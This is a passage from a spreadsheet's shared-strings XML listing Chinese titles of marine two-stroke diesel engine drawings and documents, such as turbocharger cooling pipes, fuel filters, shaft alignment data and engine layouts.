  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平台截面</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器座板</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底座顶视图（草图）</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平台尺寸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>白合金钢推力轴承质量检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>推力轴承报警</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油出口过滤器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却油出口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泄放出口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油高速搅拌器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气控制阀泄放</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部泄放箱</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油旁通管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机进排放箱出口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油出口过滤泵保护</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆软管安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自紧法列表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双燃料系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器应急滑油柜</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底层走台主管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧下层走台管系</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷舞管布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>过滤器出口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手动泵润滑油截面管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>手动泵润滑油出口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>PI21</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
  </si>
  <si>
    <r>
      <t>P122</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封空气说明</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气弹簧管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压缩空气图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气支管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>MAN</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器淡水冷却管</t>
    </r>
  </si>
  <si>
    <r>
      <t>ABB</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器淡水冷却管</t>
    </r>
  </si>
  <si>
    <r>
      <t>MET</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器淡水冷却管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器清洗管（水）</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器清洗管孔</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>汽水分离器安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冷却水管安装表</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水分配管</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>离心泵进口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预热器出口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水出口柴油膜片阀进口</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>动力涡轮单元滑油系统</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废气图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>基本计算工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆提升</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>除曲轴外的机座提升</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>除曲轴外的机座后端提升</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴支撑</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧推力调整说明</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油管系统单元</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油混合单元外观</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷涂指导</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测深图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>进口控制阀管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管感光系统单元</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水冷却单元安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废热利用装置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链接装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压顶部减振器说明</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>标准起重机所需机舱高度</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查设备</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>辅助机械检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲程柴油机检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不确定船舶</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲程柴油机布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>油轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲程柴油机布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚装船</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲程柴油机布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>其他船</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲程柴油机布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油输出单元</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>其他辅助机械</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器起重机梁</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机制动马力选择</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>尺寸</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>重量研究</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工作模型</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>锲支撑安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴系对中数据</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞生产规范</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>磨损缺陷</t>
    </r>
  </si>
  <si>
    <r>
      <t>MC-S</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>往复部件生产建议</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>B+W</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>要求</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>超声波试验</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>薄壁冷却水套生产建议</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废气增压空冷器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵机构安装说明</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>往复部件找中接受标准</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气集管装配</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拆除基架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>动车试验</t>
    </r>
  </si>
  <si>
    <r>
      <t>A</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>级运输方案</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
